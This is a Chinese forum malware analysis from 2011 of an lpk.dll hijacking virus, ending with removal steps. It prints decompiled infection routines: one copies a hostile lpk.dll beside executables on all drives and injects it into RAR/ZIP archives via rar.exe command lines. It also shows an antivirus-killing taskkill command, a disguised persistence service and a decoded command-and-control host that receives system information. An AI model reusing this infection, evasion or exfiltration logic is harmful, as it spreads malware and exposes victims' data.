好友
阅读权限40
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html
除夕那天晚上写了个Lpk、并对lpk做了点研究、所以想必今天晚上看起来这些应该会方便很多、至于关于
lpk的文章请去我Blog参考笔记、这里就不废话了
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpReserved)
.text:10001A32 public DllEntryPoint
.text:10001A32 DllEntryPoint proc near
.text:10001A32
.text:10001A32 hLibModule = dword ptr 4
.text:10001A32 fdwReason = dword ptr 8
.text:10001A32 lpReserved = dword ptr 0Ch
.text:10001A32
.text:10001A32 cmp [esp+fdwReason], 1
.text:10001A37 push esi
.text:10001A38 jnz short loc_10001AA9
.text:10001A3A mov esi, [esp+4+hLibModule]
.text:10001A3E push 104h ; nSize
.text:10001A43 push offset ExistingFileName ; lpFilename
.text:10001A48 push esi ; hModule
.text:10001A49 mov dword_10003290, esi
.text:10001A4F call ds:GetModuleFileNameW
.text:10001A55 push esi ; hLibModule
.text:10001A56 call ds:DisableThreadLibraryCalls
.text:10001A5C call GetMutexName
.text:10001A61 cmp eax, 1
.text:10001A64 jnz short loc_10001AA2
.text:10001A66 call IsVirusKernelFile ;用来判断是否由病毒核
心进程释放
.text:10001A6B test eax, eax
.text:10001A6D jnz short loc_10001A7D
.text:10001A6F call CreateMutex
.text:10001A74 test eax, eax
.text:10001A76 jnz short loc_10001A7D
.text:10001A78 call ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D: ; CODE XREF: DllEntryPoint+3B�j
.text:10001A7D ; DllEntryPoint+44�j
.text:10001A7D call IsCurrentFileLpk
.text:10001A82 cmp eax, 1
.text:10001A85 jnz short loc_10001AA2
.text:10001A87 push 0 ; lpName
.text:10001A89 push 0 ; bInitialState
.text:10001A8B push eax ; bManualReset
.text:10001A8C push 0 ; lpEventAttributes
.text:10001A8E call ds:CreateEventW
.text:10001A94 mov hHandle, eax
.text:10001A99 test eax, eax
.text:10001A9B jz short loc_10001AA2
.text:10001A9D call StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2: ; CODE XREF: DllEntryPoint+32�j
.text:10001AA2 ; DllEntryPoint+53�j ...
.text:10001AA2 call InitLpk
.text:10001AA7 jmp short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------
009119E6 <lpk11.StartThread> /$ 56 push esi
009119E7 |. 33F6 xor esi, esi
009119E9 |. 56 push esi ;
/pThreadId => NULL
009119EA |. 6A 04 push 4 ; |
CreationFlags = CREATE_SUSPENDED
009119EC |. 56 push esi ; |
pThreadParm => NULL
009119ED |. 68 D3189100 push <FuckAllDisk> ; |
ThreadFunction = <lpk11.FuckAllDisk>
009119F2 |. 56 push esi ; |
StackSize => 0
009119F3 |. 56 push esi ; |
pSecurity => NULL
009119F4 |. FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
\CreateThread
009118D3 <lpk11.FuckAllDisk> . 81EC C4000000 sub esp, 0C4
009118D9 . 53 push ebx
009118DA . 55 push ebp
009118DB . 56 push esi
009118DC . 57 push edi
009118DD . 6A 60 push 60 ;
/Length = 60 (96.)
009118DF . 8D4424 78 lea eax, dword ptr [esp+78] ; |
009118E3 . 50 push eax ; |
Destination
009118E4 . 33FF xor edi, edi ; |
009118E6 . FF15 34209100 call dword ptr [<&KERNEL32.RtlZeroMem>;
\RtlZeroMemory
009118EC > 6A 02 push 2
009118EE . 5B pop ebx
009118EF . 8D6C24 74 lea ebp, dword ptr [esp+74]
009118F3 . C74424 10 180>mov dword ptr [esp+10], 18
009118FB > 837D 00 01 cmp dword ptr [ebp], 1
009118FF . 74 5B je short 0091195C
00911901 . 53 push ebx
00911902 . FF15 B4209100 call dword ptr [<&SHELL32.#64>] ;
shell32.DriveType
00911908 . 83C0 FE add eax, -2
0091190B . 83F8 02 cmp eax, 2 ; 类
型否为可感染类型?
0091190E . 77 4C ja short 0091195C
00911910 . 33C0 xor eax, eax
00911912 . 50 push eax ;
/pThreadId => NULL
00911913 . 6A 04 push 4 ; |
CreationFlags = CREATE_SUSPENDED
00911915 . 53 push ebx ; |
pThreadParm
00911916 . 68 77169100 push <Infect> ; |
ThreadFunction = <lpk11.Infect>
0091191B . 50 push eax ; |
StackSize => 0
0091191C . 50 push eax ; |
pSecurity => NULL
0091191D . FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
\CreateThread
来张图片
接下来的用IDA分析signed int __stdcall Infect(LPCWSTR lpString1)
{
const WCHAR *v2; // eax@17
struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
WCHAR String2; // [sp+254h] [bp-418h]@4
WCHAR FileName; // [sp+45Ch] [bp-210h]@6
HANDLE hFindFile; // [sp+664h] [bp-8h]@6
int v7; // [sp+668h] [bp-4h]@1
const WCHAR *v8; // [sp+674h] [bp+8h]@17
v7 = 1;
if ( WaitForSingleObject(hHandle, 0) != 258 )
return 0;
if ( (unsigned int)lpString1 >= 0x100 )
{
lstrcpyW(&String2, lpString1);
}
else
{
lstrcpyW(&String2, L"A:\");
String2 += (unsigned __int16)lpString1;
}
lstrcpyW(&FileName, &String2);
PathAppendW(&String2, &word_10002374);
hFindFile = FindFirstFileW(&String2, &FindFileData);
if ( hFindFile == (HANDLE)-1 )
return 1;
lstrcpyW(&String2, &FileName);
while ( 1 )
{
if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..")
)
goto LABEL_27;
if ( FindFileData.dwFileAttributes & 0x10 )
break;
v2 = PathFindExtensionW(FindFileData.cFileName);
v8 = v2;
if ( v2 )
{
if ( !lstrcmpiW(v2, L".EXE") ) // 目录下有exe就将lpk复制过去
{
lstrcpyW(&FileName, &String2);
PathAppendW(&FileName, L"lpk.dll");
if ( GetFileAttributesW(&FileName) != -1 )
goto LABEL_27;
CopyFileW(&ExistingFileName, &FileName, 1);
SetFileAttributesW(&FileName, 7u);
}
if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
{
if ( !FindFileData.nFileSizeHigh )
{
if ( FindFileData.nFileSizeLow < 0x3200000 )
{
lstrcpyW(&FileName, &String2);
PathAppendW(&FileName, FindFileData.cFileName);
InfectCompressFile(&FileName);
}
}
}
}
DWORD __cdecl InfectCompressFile(int a1)
{
DWORD result; // eax@1
wchar_t v2[2]; // eax@3
UINT v3; // eax@6
WCHAR CommandLine; // [sp+0h] [bp-824h]@6
WCHAR PathName; // [sp+410h] [bp-414h]@6
WCHAR FileName; // [sp+618h] [bp-20Ch]@1
const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
int v8; // [sp+820h] [bp-4h]@1
v8 = 520;
result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0,
&FileName, &v8);
if ( !result )
{
if ( FileName == 34 )
{
lstrcpyW(&FileName, &String2);
*(_DWORD *)v2 = L""";
}
else
{
*(_DWORD *)v2 = L" ";
}
result = StrStrIW(&FileName, *(_DWORD *)v2);
if ( result )
{
*(_WORD *)result = 0;
PathRemoveFileSpecW(&FileName);
PathAppendW(&FileName, L"rar.exe");
result = GetFileAttributesW(&FileName);
if ( result != -1 )
{
PathGetShortPath(&FileName);
GetTempPathW(MAX_PATH, &PathName);
v3 = GetCurrentThreadId();
GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
&CommandLine,
L"cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"",
&FileName,
a1,
&PathName);
result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
if ( result )
{
wsprintfW(&CommandLine, L""%s" x "%s" *.exe "%s\\"", &FileName, a1,
&PathName);
UpdatePackage(&CommandLine, 0x1D4C0u);
Infect(&PathName);
wsprintfW(&CommandLine, L""%s" a -r -ep1"%s" "%s" "%s\\lpk.dll"", &FileName,
&PathName, a1, &PathName);
UpdatePackage(&CommandLine, 0x3A980u);
wsprintfW(&CommandLine, L"cmd /c RD /s /q "%s"", &PathName);
result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
}
}
}
}
return result;
}
以下是病毒释放出来的核心exe程序分析
有趣的IAT加密
用SOD申请一块内存空间、其实1个字节足以……懒得找空地了、浪费下……
decodeFF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA
00403600 $ FF05 0000AF00 inc dword ptr [AF0000]
用这块代码把第一部分IAT解密出来了00403636 .- FF25 E08D4000 jmp dword ptr [408DE0] ; USER32.LoadIconA
0040363C $ 51 push ecx
0040363D . 52 push edx
0040363E . 68 DC8D4000 push 00408DDC
00403643 .^ E9 E0FFFFFF jmp 00403628
00403648 .- FF25 DC8D4000 jmp dword ptr [408DDC] ; USER32.wsprintfA
0040364E $ 51 push ecx
0040364F . 52 push edx
00403650 . 68 D88D4000 push 00408DD8
00403655 .^ E9 CEFFFFFF jmp 00403628
0040365A .- FF25 D88D4000 jmp dword ptr [408DD8] ;
USER32.GetDesktopWindow
00403660 $ 51 push ecx
00403661 . 52 push edx
00403662 . 68 E48D4000 push 00408DE4
00403667 .^ E9 BCFFFFFF jmp 00403628
0040366C .- FF25 E48D4000 jmp dword ptr [408DE4] ; USER32.SetWindowLongA
00403672 $ 51 push ecx
00403673 . 52 push edx
00403674 . 68 D08D4000 push 00408DD0
00403679 .^ E9 AAFFFFFF jmp 00403628
0040367E .- FF25 D08D4000 jmp dword ptr [408DD0] ; USER32.SendMessageA
00403684 $ 51 push ecx
00403685 . 52 push edx
00403686 . 68 CC8D4000 push 00408DCC
0040368B .^ E9 98FFFFFF jmp 00403628
00403690 .- FF25 CC8D4000 jmp dword ptr [408DCC] ; USER32.DrawIcon
00403696 $ 51 push ecx
00403697 . 52 push edx
00403698 . 68 C88D4000 push 00408DC8
0040369D .^ E9 86FFFFFF jmp 00403628
004036A2 .- FF25 C88D4000 jmp dword ptr [408DC8] ; USER32.GetClientRect
004036A8 . 51 push ecx
004036A9 . 52 push edx
004036AA . 68 C48D4000 push 00408DC4
004036AF .^ E9 74FFFFFF jmp 00403628
004036B4 .- FF25 C48D4000 jmp dword ptr [408DC4] ;
USER32.GetSystemMetrics
004036BA $ 51 push ecx
004036BB . 52 push edx
004036BC . 68 D48D4000 push 00408DD4
004036C1 .^ E9 62FFFFFF jmp 00403628
004036C6 .- FF25 D48D4000 jmp dword ptr [408DD4] ; USER32.IsIconic
004036CC $ 51 push ecx
004036CD . 52 push edx
004036CE . 68 E88D4000 push 00408DE8
004036D3 .^ E9 50FFFFFF jmp 00403628
004036D8 .- FF25 E88D4000 jmp dword ptr [408DE8] ; USER32.EnableWindow
00408DC4 77D18F9C USER32.GetSystemMetrics
00408DC8 77D2908E USER32.GetClientRect
00408DCC 77D3D06C USER32.DrawIcon
00408DD0 77D2F3C2 USER32.SendMessageA
00408DD4 77D297FF USER32.IsIconic
00408DD8 77D2D1D2 USER32.GetDesktopWindow
00408DDC 77D1A8AD USER32.wsprintfA
00408DE0 77D2E8F6 USER32.LoadIconA
00408DE4 77D2C29D USER32.SetWindowLongA
00408DE8 77D29849 USER32.EnableWindow
004036D3 >^/E9 28FFFFFF jmp 00403600
004036D8 .^|FF25 E88D4000 jmp dword ptr [408DE8] ; ggmqgk.004036CC
004036DE $ |51 push ecx
004036DF . |52 push edx
004036E0 . |68 AC8D4000 push 00408DAC
004036E5 . |E9 00000000 jmp 004036EA
004036EA > |68 98694000 push 00406998
004036EF . |E8 2C020000 call 00403920
004036F4 . |5A pop edx
004036F5 . |59 pop ecx
004036F6 .^\EB DB jmp short 004036D3
004036F8 .- FF25 AC8D4000 jmp dword ptr [408DAC] ; advapi32.DeleteService
004036FE $ 51 push ecx
004036FF . 52 push edx
00403700 . 68 B08D4000 push 00408DB0 ; ASCII "6L躻~i躻"
00403705 .^ E9 E0FFFFFF jmp 004036EA
0040370A .- FF25 B08D4000 jmp dword ptr [408DB0] ; advapi32.OpenServiceA
00403710 $ 51 push ecx
00403711 . 52 push edx
00403712 . 68 B48D4000 push 00408DB4 ; ASCII "~i躻"
00403717 .^ E9 CEFFFFFF jmp 004036EA
0040371C .- FF25 B48D4000 jmp dword ptr [408DB4] ;
advapi32.OpenSCManagerA
00403722 $ 51 push ecx
00403723 . 52 push edx
00403724 . 68 A88D4000 push 00408DA8
00403729 .^ E9 BCFFFFFF jmp 004036EA
0040372E .- FF25 A88D4000 jmp dword ptr [408DA8] ; advapi32.RegCloseKey
00403734 $ 51 push ecx
00403735 . 52 push edx
00403736 . 68 A48D4000 push 00408DA4
0040373B .^ E9 AAFFFFFF jmp 004036EA
00403740 .- FF25 A48D4000 jmp dword ptr [408DA4] ;
advapi32.RegQueryValueExA
00403746 $ 51 push ecx
00403747 . 52 push edx
00403748 . 68 A08D4000 push 00408DA0
0040374D .^ E9 98FFFFFF jmp 004036EA
00403752 .- FF25 A08D4000 jmp dword ptr [408DA0] ; advapi32.RegOpenKeyExA
00403758 . 51 push ecx
00403759 . 52 push edx
0040375A . 68 9C8D4000 push 00408D9C
0040375F .^ E9 86FFFFFF jmp 004036EA
00403764 .- FF25 9C8D4000 jmp dword ptr [408D9C] ;
advapi32.SetServiceStatus
0040376A $ 51 push ecx
0040376B . 52 push edx
0040376C . 68 988D4000 push 00408D98
00403771 .^ E9 74FFFFFF jmp 004036EA
00403776 .- FF25 988D4000 jmp dword ptr [408D98] ;
advapi32.RegisterServiceCtrlHandlerA
0040377C $ 51 push ecx
0040377D . 52 push edx
0040377E . 68 948D4000 push 00408D94
00403783 .^ E9 62FFFFFF jmp 004036EA
00403788 .- FF25 948D4000 jmp dword ptr [408D94] ;
advapi32.StartServiceCtrlDispatcherA
0040378E $ 51 push ecx
0040378F . 52 push edx
00403790 . 68 908D4000 push 00408D90
00403795 .^ E9 50FFFFFF jmp 004036EA
0040379A .- FF25 908D4000 jmp dword ptr [408D90] ;
advapi32.CloseServiceHandle
004037A0 $ 51 push ecx
004037A1 . 52 push edx
004037A2 . 68 8C8D4000 push 00408D8C
004037A7 .^ E9 3EFFFFFF jmp 004036EA
004037AC .- FF25 8C8D4000 jmp dword ptr [408D8C] ;
advapi32.RegSetValueExA
004037B2 $ 51 push ecx
004037B3 . 52 push edx
004037B4 . 68 888D4000 push 00408D88
004037B9 .^ E9 2CFFFFFF jmp 004036EA
004037BE .- FF25 888D4000 jmp dword ptr [408D88] ; advapi32.RegOpenKeyA
004037C4 $ 51 push ecx
004037C5 . 52 push edx
004037C6 . 68 808D4000 push 00408D80
004037CB .^ E9 1AFFFFFF jmp 004036EA
004037D0 .- FF25 808D4000 jmp dword ptr [408D80] ; advapi32.StartServiceA
004037D6 $ 51 push ecx
004037D7 . 52 push edx
004037D8 . 68 848D4000 push 00408D84
004037DD .^ E9 08FFFFFF jmp 004036EA
004037E2 .- FF25 848D4000 jmp dword ptr [408D84] ;
advapi32.CreateServiceA
00408D80 77DBFB38 advapi32.StartServiceA
00408D84 77E071E9 advapi32.CreateServiceA
00408D88 77DAEFB8 advapi32.RegOpenKeyA
00408D8C 77DAEAD7 advapi32.RegSetValueExA
00408D90 77DB6CC5 advapi32.CloseServiceHandle
00408D94 77E07EB1 advapi32.StartServiceCtrlDispatcherA
00408D98 77DC4E96 advapi32.RegisterServiceCtrlHandlerA
00408D9C 77DC3231 advapi32.SetServiceStatus
00408DA0 77DA7842 advapi32.RegOpenKeyExA
00408DA4 77DA7AAB advapi32.RegQueryValueExA
00408DA8 77DA6C17 advapi32.RegCloseKey
00408DAC 77E07489 advapi32.DeleteService
00408DB0 77DC4C36 advapi32.OpenServiceA
00408DB4 77DC697E advapi32.OpenSCManagerA
、大家有兴趣自己玩好了…….text:004029E0 ; =============== S U B R O U T I N E =======================================
.text:004029E0
.text:004029E0 ; Attributes: bp-based frame
.text:004029E0
.text:004029E0 OnInit proc near ; DATA XREF: .rdata:00406474�o
.text:004029E0
.text:004029E0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004029E0 var_8 = dword ptr -8
.text:004029E0 var_4 = dword ptr -4
.text:004029E0
.text:004029E0 push ebp
.text:004029E1 ; 8: v1 = this;
.text:004029E1 mov ebp, esp
.text:004029E3 sub esp, 10h
.text:004029E6 push esi
.text:004029E7 push edi
.text:004029E8 mov esi, ecx
.text:004029EA ; 9: CDialog__OnInitDialog();
.text:004029EA call ?OnInitDialog@CDialog@@UAEHXZ ; CDialog::OnInitDialog
(void)
.text:004029EF ; 10: SendMessageA(*((HWND *)v1 + 8), 128u, 1u, *((_DWORD *)v1 + 24));
.text:004029EF mov eax, [esi+60h]
.text:004029F2 mov ecx, [esi+20h]
.text:004029F5 mov edi, SendMessageA
.text:004029FB push eax ; lParam
.text:004029FC push 1 ; wParam
.text:004029FE push 80h ; Msg
.text:00402A03 push ecx ; hWnd
.text:00402A04 call edi ; SendMessageA
.text:00402A06 ; 11: SendMessageA(*((HWND *)v1 + 8), 0x80u, 0, *((_DWORD *)v1 + 24));
.text:00402A06 mov edx, [esi+60h]
.text:00402A09 mov eax, [esi+20h]
.text:00402A0C push edx ; lParam
.text:00402A0D push 0 ; wParam
.text:00402A0F push 80h ; Msg
.text:00402A14 push eax ; hWnd
.text:00402A15 call edi ; SendMessageA
.text:00402A17 ; 12: if ( v1 )
.text:00402A17 test esi, esi
.text:00402A19 jnz short loc_402A1F
.text:00402A1B ; 15: v2 = 0;
.text:00402A1B xor eax, eax
.text:00402A1D jmp short loc_402A22
.text:00402A1F ; ---------------------------------------------------------------------------
.text:00402A1F ; 13: v2 = (HWND)*((_DWORD *)v1 + 8);
.text:00402A1F
.text:00402A1F loc_402A1F: ; CODE XREF: OnInit+39�j
.text:00402A1F mov eax, [esi+20h]
.text:00402A22 ; 16: SetWindowLongA(v2, -20, 128);
.text:00402A22
.text:00402A22 loc_402A22: ; CODE XREF: OnInit+3D�j
.text:00402A22 push 80h ; dwNewLong
.text:00402A27 push 0FFFFFFECh ; nIndex
.text:00402A29 push eax ; hWnd
.text:00402A2A call SetWindowLongA
.text:00402A30 ; 17: CWnd__SetWindowPos(v1, 0, -100, -100, 0, 0, 1);
.text:00402A30 push 1
.text:00402A32 push 0
.text:00402A34 push 0
.text:00402A36 push 0FFFFFF9Ch
.text:00402A38 push 0FFFFFF9Ch
.text:00402A3A push 0
.text:00402A3C mov ecx, esi
.text:00402A3E call ?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z ;
CWnd::SetWindowPos(CWnd const *,int,int,int,int,uint)
.text:00402A43 ; 18: WinExec("taskkill /f /im ZhuDongFangYu.exe /t", 0);// - -这种方法也能杀
掉?作者脑子里进屎了、
.text:00402A43 nop
.text:00402A44 nop
.text:00402A45 nop
.text:00402A46 nop
.text:00402A47 nop
.text:00402A48 nop
.text:00402A49 nop
.text:00402A4A nop
.text:00402A4B nop
.text:00402A4C nop
.text:00402A4D nop
.text:00402A4E nop
.text:00402A4F nop
.text:00402A50 nop
.text:00402A51 nop
.text:00402A52 nop
.text:00402A53 nop
.text:00402A54 nop
.text:00402A55 nop
.text:00402A56 push 0 ; uCmdShow
.text:00402A58 push offset CmdLine ; "taskkill /f /im ZhuDongFangYu.exe
/t"
.text:00402A5D call ds:WinExec
.text:00402A63 ; 19: if ( RegOpenKey() )
.text:00402A63 call RegOpenKey
.text:00402A68 pop edi
.text:00402A69 pop esi
.text:00402A6A test eax, eax
.text:00402A6C jz short loc_402A9D
.text:00402A6E ; 21: ServiceStartTable.lpServiceName = "Distribuvbf";
.text:00402A6E lea ecx, [ebp+ServiceStartTable]
.text:00402A71 mov [ebp+ServiceStartTable.lpServiceName], offset
ServiceName ; "Distribuvbf"
.text:00402A78 ; 22: ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)
sub_402730;
.text:00402A78 push ecx ; lpServiceStartTable
.text:00402A79 mov [ebp+ServiceStartTable.lpServiceProc], offset
sub_402730
.text:00402A80 ; 23: v5 = 0;
.text:00402A80 mov [ebp+var_8], 0
.text:00402A87 ; 24: v6 = 0;
.text:00402A87 mov [ebp+var_4], 0
.text:00402A8E ; 25: StartServiceCtrlDispatcherA(&ServiceStartTable);
.text:00402A8E call StartServiceCtrlDispatcherA ; 存在就直接启动
.text:00402A94 ; 39: return 1;
.text:00402A94
.text:00402A94 loc_402A94: ; CODE XREF: OnInit+DB�j
.text:00402A94 mov eax, 1
.text:00402A99 mov esp, ebp
.text:00402A9B pop ebp
.text:00402A9C retn
.text:00402A9D ; ---------------------------------------------------------------------------
.text:00402A9D ; 29: sub_402B40(
.text:00402A9D ; 30: "Distribuvbf",
.text:00402A9D ; 31: "Distribuihd Transaction Coordinator Service",
.text:00402A9D ; 32: "Distribucha Transaction Coordinator Service.");
.text:00402A9D
.text:00402A9D loc_402A9D: ; CODE XREF: OnInit+8C�j
.text:00402A9D push offset Data ; "Distribucha Transaction Coordinator
Ser"...
.text:00402AA2 push offset DisplayName ; "Distribuihd Transaction
Coordinator Ser"...
.text:00402AA7 push offset ServiceName ; "Distribuvbf"
.text:00402AAC call RegServiceAndStart
.text:00402AB1 ; 33: if ( dword_409388 )
.text:00402AB1 mov eax, dword_409388 ; 失败了就退出……
.text:00402AB6 add esp, 0Ch
.text:00402AB9 test eax, eax
.text:00402ABB jz short loc_402A94
.text:00402ABD ; 35: sub_402330();
.text:00402ABD call MoveFile ; 0012F65C 0012F784 |NewName = "C:
\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SOFTWARE.LOG"
.text:00402AC2 ; 36: ExitProcess(0);
.text:00402AC2 push 0 ; uExitCode
.text:00402AC4 call ds:ExitProcess
.text:00402AC4 OnInit endp
肮脏的解密.text:004027E6 ; 20: lpkInfect();
.text:004027E6
.text:004027E6 loc_4027E6: ; CODE XREF: sub_402730+A9�j
.text:004027E6 call lpkInfect
.text:004027EB ; 21: wsprintfA(&v0, "hra%u.dll", 33);
.text:004027EB push 21h
.text:004027ED lea ecx, [esp+14h]
.text:004027F1 push offset aHraU_dll ; "hra%u.dll"
.text:004027F6 push ecx ; LPSTR
.text:004027F7 call wsprintfA
.text:004027FD ; 22: sub_402520(&v0);
.text:004027FD lea edx, [esp+1Ch]
.text:00402801 push edx ; pFileName
.text:00402802 call sub_402520
.text:00402807 ; 23: LoadVirusLpk();
.text:00402807 call LoadVirusLpk
.text:0040280C ; 24: decode((int)"s僼婸3344P弔?>6>6", strlen("s僼婸3344P弔?>6>6") - 1, 18);
.text:0040280C mov edi, offset aSgtlp3344pptz66 ; ; ASCII
"scrk.3322.org:8080"
.text:0040280C ; 解密以后的字符串
.text:00402811 or ecx, 0FFFFFFFFh
.text:00402814 xor eax, eax
.text:00402816 push 12h
.text:00402818 repne scasb
.text:0040281A not ecx
.text:0040281C dec ecx
.text:0040281D push ecx
.text:0040281E push offset aSgtlp3344pptz66 ; "s僼婸3344P弔?>6>6"
.text:00402823 call decode
.text:00402828 ; 25: WSAStartup(0x202u, (struct WSAData *)((char *)&WSAData + 16));
.text:00402828 add esp, 1Ch
.text:0040282B lea eax, [esp+294h+WSAData.szDescription+0Ch]
.text:00402832 push eax ; lpWSAData
.text:00402833 push 202h ; wVersionRequested
.text:00402838 call WSAStartup
.text:0040283E mov edi, ds:WaitForSingleObject
.text:00402844 mov ebx, ds:CloseHandle
.text:0040284A mov ebp, closesocket
.text:00402850 ; 28: hObject = CreateThraed((LPTHREAD_START_ROUTINE)bAdApple, 0);我对臭苹
果的怨念是世界级的……
.text:00402850
.text:00402850 loc_402850: ; CODE XREF: sub_402730+159�j
.text:00402850 push 0 ; lpParameter
.text:00402852 push offset bAdApple ; lpStartAddress
.text:00402857 call CreateThraed
.text:0040285C ; 29: WaitForSingleObject(hObject, 0xFFFFFFFFu);
.text:0040285C push 0FFFFFFFFh ; dwMilliseconds
.text:0040285E ; 26: while ( 1 )
.text:0040285E push eax ; hHandle
.text:0040285F mov hObject, eax
.text:00402864 call edi ; WaitForSingleObject
.text:00402866 ; 30: CloseHandle(hObject);
.text:00402866 mov ecx, hObject
.text:0040286C push ecx ; hObject
.text:0040286D call ebx ; CloseHandle
.text:0040286F ; 31: closesocket(s);
.text:0040286F mov edx, s
.text:00402875 push edx ; s
.text:00402876 call ebp ; closesocket
.text:00402878 ; 33: Sleep(0x12Cu);
.text:00402878 push 12Ch ; dwMilliseconds
.text:0040287D ; 32: dword_408634 = 1;
.text:0040287D mov dword_408634, 1
.text:00402887 call esi ; Sleep
.text:00402889 jmp short loc_402850
然后就是CreateThread干坏事
坏事回调函数
004019C0 . 81EC C4090000 sub esp, 9C4
此部分比较长了、而且不大会分析、各位有兴趣可以去看我上传的idb
然后是一系列获取计算机基本信息、然后寄送到上面解密出来的地址……装载肮脏的Lpk进行感染……
至此全病毒感染模块分析完毕……因为本人是网络白痴、就算见到了网络操作代码也不知道到底是干什么的
……囧虚……
此病毒就是启动一个服务、坏事都在服务里做,因为本人也没搞过服务程序开发、所以也不知道这块怎么分
析、不过零散的分析大概已经把服务要做的事情都分析出来了……
删除病毒时首先停止病毒服务、然后用XueTr删除病毒服务、并且来到System32下找到最新更改的exe、大概
就是那个了、建议用工具删除、因为这个东西连压缩文件都感染了、手工处理不大方便、当然也可以写个工
具……
- -讨厌这种用技术干坏事的、鄙视下病毒作者、还真是无聊啊……这种猫和老鼠的游戏大概永远都不会结
束吧……
其实说句实话今天分析这个病毒是因为中午帮同学修电脑修坏了……、发泄下、……真是Bug啊……又把别
人的Bootmgr压缩了……- -刚才已经解决完毕了……所以我也没有必要继续寂寞下去了……娱乐去了、各位
晚安。
游戏CG x1附赠
Azure[LCG]
2011.02.06
|
-
-
样本.rar
31.92 KB, 下载次数: 22, 下载积分: 吾爱币 -1 CB
-
-
idb.rar
241.57 KB, 下载次数: 12, 下载积分: 吾爱币 -1 CB
|
发表于 2011-2-6 20:19
发表于 2011-2-6 20:30
